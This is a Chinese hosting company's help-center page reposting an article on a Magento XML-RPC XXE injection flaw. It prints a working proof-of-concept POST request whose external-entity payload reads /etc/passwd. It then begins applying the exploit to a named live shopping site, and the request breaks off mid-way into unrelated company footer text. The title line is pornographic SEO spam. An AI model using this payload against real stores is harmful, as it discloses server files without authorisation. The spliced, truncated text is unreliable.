久久精品国产亚洲怮怮_奇米网777色在线精品_亚洲色中文字幕制服丝袜_久久精品人人做人人看

<abbr id="6ggqk"><tfoot id="6ggqk"></tfoot></abbr>

<ul id="6ggqk"></ul>

<fieldset id="6ggqk"></fieldset>

<rt id="6ggqk"><delect id="6ggqk"></delect></rt>

<tbody id="6ggqk"></tbody>

始創(chuàng)于2000年股票代碼：831685

咨詢熱線：0371-60135900 注冊有禮登錄

掛牌上市企業(yè)
60秒人工響應
99.99%連通率
7*24h人工
故障100倍補償

全部產(chǎn)品

您的位置：網(wǎng)站首頁 > 幫助中心>文章內(nèi)容

文章內(nèi)容

Magento eCommerce Platform XXE Injection利用

發(fā)布時間: 2012/7/28 18:51:30

在wooyun-zone xsser的文章zend framework文件讀取漏洞分析中有提及到magento，下面是其中的原文：

據(jù)@蟋蟀哥哥在烏云上的漏洞報告提醒，一些開源軟件因為使用了zend framework的xml模塊功能導致存在了問題，Magento就是其中一個典型的軟件，并且已經(jīng)有多個在線網(wǎng)店證明存在這個問題。

@蟋蟀哥哥的漏洞在這http://www.wooyun.org/bugs/wooyun-2010-09297

0x2

今天看packetstormsecurity時看到了這個漏洞的細節(jié)：http://packetstormsecurity.org/files/114710/Magento-eCommerce-Platform-XXE-Injection.html

利用方法其中也說的很明白：

Proof of concept:
-----------------
Magento uses a vulnerable Zend_XmlRpc_Server() class (Zend\XmlRpc\Server.php)
to handle XML-RPC requests. Hence it is possible to disclose arbitrary local
files from the remote system. The following HTTP POST request to the
vulnerable XmlRpc server application illustrates the exploitation of this
vulnerability:

POST /index.php/api/xmlrpc HTTP/1.1
Host: $host

<?xml version="1.0"?>
<!DOCTYPE foo [
<!ELEMENT methodName ANY >
<!ENTITY xxe SYSTEM"file:///etc/passwd" >]>
<methodCall>
<methodName>&xxe;</methodName>
</methodCall>

0x3

現(xiàn)在到magento中文社區(qū)看看演示站點。

這里拿威風網(wǎng)為例：

用burp提交數(shù)據(jù)包如下：

POST /index.php/api/xmlrpc HTTP/1.1

Host: www.fengbuy.com

Proxy-Connection: keep-alive

User-Agent: Mozilla/5.0 (Windows NT 6.1)AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1155.2 Safari/537.1

億恩科技地址(ADD)：鄭州市黃河路129號天一大廈608室郵編(ZIP)：450008 傳真(FAX)：0371-60123888
   聯(lián)系：億恩小凡
   QQ：89317007
   電話:0371-63322206

本文出自：億恩科技【prubsntakaful.com】

服務器租用/服務器托管中國五強！虛擬主機域名注冊頂級提供商！15年品質(zhì)保障！--億恩科技[ENKJ.COM]

上一篇 >> 虛擬化，你面臨的最大挑戰(zhàn)是什么？
下一篇 >> 存儲虛擬化給企業(yè)帶來的主要利益

同類文章

您可能在找

服務器托管/租用

億恩云建站

億恩北京公司：

經(jīng)營性ICP/ISP證：京B2-20150015

億恩鄭州公司：

經(jīng)營性ICP/ISP/IDC證：豫B1.B2-20060070

億恩南昌公司：

經(jīng)營性ICP/ISP證：贛B2-20080012

服務器/云主機 24小時售后服務電話：0371-60135900

虛擬主機/智能建站 24小時售后服務電話：0371-60135900

專注服務器托管17年

掃掃關注-微信公眾號

0371-60135900

Copyright© 1999-2019 ENKJ All Rights Reserved 億恩科技版權所有　地址：鄭州市高新區(qū)翠竹街1號總部企業(yè)基地億恩大廈　法律顧問：河南亞太人律師事務所郝建鋒、杜慧月律師

京公網(wǎng)安備41019702002023號

億恩公告

在線客服

服務器托管
服務器租用
云服務器
域名/空間
云建站

0371-60135900
7*24小時客服服務熱線